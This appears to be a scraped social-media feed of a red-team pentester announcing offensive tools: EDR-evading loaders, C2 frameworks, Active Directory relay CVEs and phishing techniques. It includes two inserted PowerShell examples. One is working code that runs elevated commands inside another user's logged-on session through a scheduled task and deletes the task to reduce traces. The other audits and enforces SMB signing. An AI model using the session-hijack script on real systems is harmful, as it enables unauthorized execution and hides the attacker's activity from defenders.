BlackWasp (@BlWasp_)
Pentester and Red Team technical leader at Advens | Microsoft MVP
Joined August 2016
Followers: 2K | Following: 10K | Media: 40 | Statuses: 891
It had been a while since I last updated my #CheatSheets:
- AORTA
- DMSA
- GPP/O hijacking
- MSSQL/GPOHound, gpoParser
- NTLM and Kerberos attacks (relay, CVE, RemoteMonologue, ...)
- Creds dump and many new NXC modules
- SCCM / MDT stuff
- A new NFS page
https://t.co/41oK5sXkiT
New BOF to run native PE in the Cobalt Strike beacon without console allocation or pipe creation. Like BOF_Spawn, this BOF is malleable with proxy/spoof for LoadLibraryA, allocation methods (Heap, VirtualAlloc, Module Stomping) and some other tweaks :) https://t.co/19PX3WHB40
🚀 Introducing MoxPack: A template builder for Proxmox using Packer. Generate Windows & Linux VM templates with cloud-init support and sysprep. Ideal for lab automation and infra-as-code. https://t.co/ewTGY6NqIU
github.com: A Qemu Proxmox Template builder project using Packer - Orange-Cyberdefense/moxpack
Meet PhantomTask — a tiny Rust CLI that creates and executes Windows Task Scheduler jobs with session hijacking. Enumerate sessions, elevate, pass creds, trigger now. Everything with WinAPI and direct COM interactions. Repo:
github.com: A tool to play with scheduled tasks on Windows, in Rust - BlWasp/PhantomTask
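The workflow the PhantomTask post describes (enumerate sessions, pick a logged-on user, create a task bound to that user's interactive session, trigger it now), redone with the built-in ScheduledTasks module as an added example. This is not PhantomTask's code, which drives the Task Scheduler through COM directly; the task name, target user and command are placeholders, and it needs local administrator rights on the host where it runs.

```powershell
# Added example, not PhantomTask's source: session-targeted scheduled task
# using the ScheduledTasks module instead of direct COM calls.
# Placeholders: task name 'PhantomTaskDemo', user 'DOMAIN\alice', command.

function Get-InteractiveSessions {
    # One object per logged-on session, parsed from `quser`. The current
    # session is prefixed with '>' and disconnected sessions have an empty
    # SESSIONNAME column; the regex tolerates both.
    $pattern = '^[\s>]\s*(?<user>\S+)\s+(?:(?<session>\S+)\s+)?(?<id>\d+)\s+(?<state>\S+)'
    quser 2>$null | Select-Object -Skip 1 | ForEach-Object {
        if ($_ -match $pattern) {
            [pscustomobject]@{
                UserName    = $Matches.user
                SessionName = $Matches.session
                Id          = [int]$Matches.id
                State       = $Matches.state      # Active or Disc
            }
        }
    }
}

function Invoke-InSession {
    param(
        [Parameter(Mandatory)][string]$UserId,    # DOMAIN\user whose session to run in
        [Parameter(Mandatory)][string]$Command,
        [string]$Arguments = '',
        [string]$TaskName  = 'PhantomTaskDemo'
    )
    $action = New-ScheduledTaskAction -Execute $Command -Argument $Arguments

    # LogonType Interactive binds the task to that user's existing desktop
    # session (no password needed, which is the "session hijacking" part);
    # RunLevel Highest asks for the elevated token when the user is an admin.
    # To "pass creds" instead, drop -Principal and call Register-ScheduledTask
    # with -User / -Password, which runs the task without a live session.
    $principal = New-ScheduledTaskPrincipal -UserId $UserId -LogonType Interactive -RunLevel Highest

    Register-ScheduledTask -TaskName $TaskName -Action $action -Principal $principal -Force | Out-Null
    try {
        Start-ScheduledTask -TaskName $TaskName          # "trigger now"
        Start-Sleep -Seconds 2
        (Get-ScheduledTaskInfo -TaskName $TaskName).LastTaskResult
    }
    finally {
        # Remove the artifact so the only trace left is the event log.
        Unregister-ScheduledTask -TaskName $TaskName -Confirm:$false
    }
}

# Usage: pick an active session, run a command inside it.
$active = Get-InteractiveSessions | Where-Object State -eq 'Active'
$active | Format-Table -AutoSize
Invoke-InSession -UserId 'DOMAIN\alice' -Command 'cmd.exe' -Arguments '/c whoami /all > C:\Temp\who.txt'
```

Defensively, the interesting events are the task registration and deletion (Security 4698/4699 when task auditing is on, and the TaskScheduler operational log), which is why the cleanup in `finally` matters for both sides.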
Small update on "printerbugnew": added a description of how to exploit CVE-2025-54918: DCs running 2025 allow reflection RPC->LDAPS - from a standard user to DA before patch😃
github.com: The DCERPC only printerbug.py version. Contribute to decoder-it/printerbugnew development by creating an account on GitHub.
MaldevAcademyLdr.2: https://t.co/P3joCJU3Rs
Key Features:
- Steganography
- Thread stack spoofing
- Hiding PE payload in GPU memory
- Syscall tampering using the Trap Flag
- Full list of features available in the README
github.com: RunPE implementation with multiple evasive techniques - Maldev-Academy/MaldevAcademyLdr.2
Next week we are releasing a RunPE implementation which has been tested thoroughly against several EDRs. The demonstration video shows the implementation running Mimikatz and successfully evading PE-sieve.
I have just finished an update on WDSFinder, right before my rump at @WineRump : WDSFinder now supports LDAPS with Channel Binding, and LDAP with Session Signing enforced! The code may also prove useful for those trying to use these protocols in Rust.✌️ https://t.co/KpQpVUbWru
github.com: This new version adds the capability to authenticate and request LDAP when Session Signing is Enforced. Additionally, LDAPS is now also supported, even with Channel Binding set to Always.
Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! https://t.co/0aPVihoFIU
infinitycurve.org: An introduction to Havoc Professional and Kaine-kit, exploring the advanced features and capabilities that make them lucrative for modern security professionals.
Additionally, I have coded a little tool to automate the detection of these shares:
github.com: A simple tool to identify WDS servers in Active Directory - BlWasp/WDSFinder
Some weeks ago, @TrustedSec posted a really interesting blog post about the MDT shares and the credentials that can be found inside. But one question remained unanswered: where are they? I have tried to answer this question: https://t.co/iG5l6FLji8
Currently, if this patch is not deployed in an Active Directory, anyone with a user account is able to take over any asset, except for DCs, by default!
Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Checkout the details in the blogpost by @yaumn_ and @wil_fri3d. https://t.co/EY5Z53w1ZT
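The precondition named above is SMB signing not being required on the target, so the first thing to check is which hosts still accept unsigned SMB sessions. Added PowerShell example, not from the tweet or the linked blog post: inventory the effective LanmanServer signing settings over WinRM and enforce signing where it is missing. Hostnames are placeholders; the cmdlets are from the built-in SmbShare module and need administrator rights on each target. Domain controllers require signing by default, which matches the "except for DCs" exception in the post above.

```powershell
# Added example: inventory and enforce SMB server signing. Hostnames are
# placeholders for your own asset list; requires admin rights + WinRM.

function Get-SmbSigningStatus {
    param([Parameter(Mandatory)][string[]]$ComputerName)

    foreach ($computer in $ComputerName) {
        try {
            # RequireSecuritySignature = $true is the setting that refuses
            # unsigned sessions; EnableSecuritySignature alone only offers
            # signing and does not stop a relayed, unsigned session.
            $cfg = Invoke-Command -ComputerName $computer -ErrorAction Stop -ScriptBlock {
                Get-SmbServerConfiguration |
                    Select-Object RequireSecuritySignature, EnableSecuritySignature
            }
            [pscustomobject]@{
                ComputerName    = $computer
                SigningRequired = [bool]$cfg.RequireSecuritySignature
                SigningEnabled  = [bool]$cfg.EnableSecuritySignature
                Error           = $null
            }
        }
        catch {
            # Unreachable hosts are reported, not silently skipped, so the
            # report distinguishes "not required" from "not checked".
            [pscustomobject]@{
                ComputerName    = $computer
                SigningRequired = $null
                SigningEnabled  = $null
                Error           = $_.Exception.Message
            }
        }
    }
}

function Set-SmbSigningRequired {
    param([Parameter(Mandatory)][string[]]$ComputerName)

    foreach ($computer in $ComputerName) {
        Invoke-Command -ComputerName $computer -ScriptBlock {
            # Same effect as the GPO "Microsoft network server: Digitally sign
            # communications (always)", i.e. the registry value
            # HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\RequireSecuritySignature = 1
            Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
        }
    }
}

# Usage with a constructed host list (placeholders).
$hosts  = 'WS01', 'WS02', 'FS01'
$status = Get-SmbSigningStatus -ComputerName $hosts
$status | Format-Table -AutoSize

# Hosts that do not require signing are the ones reachable by the relay
# described above; enforce on those only (uncomment to apply).
$exposed = $status | Where-Object { $_.SigningRequired -eq $false }
# Set-SmbSigningRequired -ComputerName $exposed.ComputerName
```

Enforcing signing is the durable fix independent of the patch, since it also removes the generic NTLM-relay-to-SMB path; deploying it via GPO rather than per host keeps newly built machines from regressing.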
If you thought phishing was now ineffective, you may have missed something 👀 My latest post highlights the advanced tactics used to bypass security controls and deceive even the most savvy users. Check it out ⤵️
From classic HTML pages to advanced MFA bypasses, dive in with @_atsika in an exploration of phishing techniques 🎣. Learn some infrastructure tricks and delivery methods to bypass common detection. 👉 https://t.co/zkhi1RxnDk (promise this one is legit 👀)
I've just completed the @MalDevAcademy Malware Development Course. The course presents modern techniques for bypassing security solutions, low-level development and evasion. I would totally recommend this course to Red Team operators requiring a high level of discretion!
Kerberos relay on The Hacker Recipes, brought to you by @BlWasp_ 💪
thehacker.recipes: MITRE ATT&CK™ Sub-technique T1557.001
Just finished refactoring my network #pivoting cheatsheet! If you are in an internal engagement, and you're stuck on a pivot, perhaps the solution will lie there: https://t.co/nOJapJmz6J
Following the recent @Synacktiv's article about abusing WebClient authentications from multicast poisoning, I have made a quick PR on Responder to simplify the setup:
github.com: Hello! In this recent article, Synacktiv demonstrated that during multicast poisoning, depending on the error code returned by the SMB server at the end of the authentication process, it was possib...
Make Bloodhound Cool Again: Migrating Custom Queries from Legacy BloodHound to BloodHound CE https://t.co/Oza7NOvCA2
medium.com: We love the new Bloodhound version, it is faster, prettier, and more robust. However, due to the lack of many custom queries, we often…